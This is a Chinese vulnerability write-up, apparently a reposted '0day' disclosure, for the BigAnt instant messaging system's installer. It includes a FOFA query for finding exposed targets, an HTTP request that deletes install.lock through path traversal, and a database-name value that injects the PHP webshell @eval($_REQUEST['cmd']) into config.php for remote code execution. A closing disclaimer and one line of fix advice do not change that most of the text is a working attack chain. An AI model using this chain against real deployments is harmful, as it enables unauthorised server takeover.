文章总结： 大蚂蚁即时通讯系统安装程序存在二次注入漏洞，攻击者通过删除install.lock文件重进安装流程，在数据库配置字段注入恶意PHP代码写入配置文件实现远程代码执行。该漏洞影响5.5.x及最新版本，复现利用上传接口删锁文件，并选择Oracle绕过连通性检测进行注入。建议限制安装目录权限或移除安装脚本以修复风险。 综合评分： 91 文章分类： 漏洞POC,漏洞分析,渗透测试,WEB安全

【0day】大蚂蚁 (BigAnt) 即时通讯系统 安装程序二次注入致远程代码执行漏洞

0day收割机

2026年2月26日 17:03 山东

漏洞简介

大蚂蚁 (BigAnt) 即时通讯系统安装程序存在二次注入漏洞。攻击者可通过删除或重命名 install.lock 文件，重新进入安装流程，并在数据库配置部分（如数据库用户、IP、端口、数据库名等字段）注入恶意 PHP 代码，实现远程代码执行。

影响版本

BigAnt 5.5.x 及以上版本用户

经过测试，最新版本 6.0.1.20250407.1 也受影响

fofa语法

(body=”/Public/static/admin/admin_common.js” && body=”/Public/lang/zh-cn.js.js”) || title=”即时通讯 系统登录” && body=”/Public/static/ukey/Syunew3.js”

漏洞复现

设置路径

POST /?m=Addin&c=Pedometer&a=uploadImgCallback HTTP/1.1
Host:
Cookie: PHPSESSID=xxxxx
Content-Type: application/x-www-form-urlencoded

userId=1&src=/data/../data/install.lock

同一个包需要发送两次，第一次更新表，第二次触发删除操作

RCE

访问 /install/install 安装配置，选择其他数据库,如果选择mysql需要数据库服务器存在且可以连通

//检测连接是否有效
$db  = Db::getInstance($dbconfig);
$sql = \Common\Lib\DBHelper::getCheckConnSql($dbconfig['DB_TYPE']);
$result = $db->query($sql);
if(false === $result){
       $url = U('step2',array('dbtype'=>$dbType,'err'=>'db'));
       $this->error(L('_ERROR_DB_CONNECT_'),$url);
   }

否则可以选择Oracle,会跳过存活检测

switch(strtolower($dbType)){
    case "oracle":
        break; // 直接跳过，不执行 createDataBase
    default:
        $res = \Common\Lib\DBHelper::createDataBase(...);
}

下一步

比如，将数据库名设置成antdbms', 'test' => @eval($_REQUEST['cmd']),'

下一步

查看 Application/Common/Conf/config.php 配置文件如下图所示

成功写入并执行php代码

仅供安全研究和学习使用。若因传播、利用本文档信息而产生任何直接或间接的后果或损害，均由使用者自行承担，文章作者不为此承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：0day收割机 《【0day】大蚂蚁 (BigAnt) 即时通讯系统 安装程序二次注入致远程代码执行漏洞》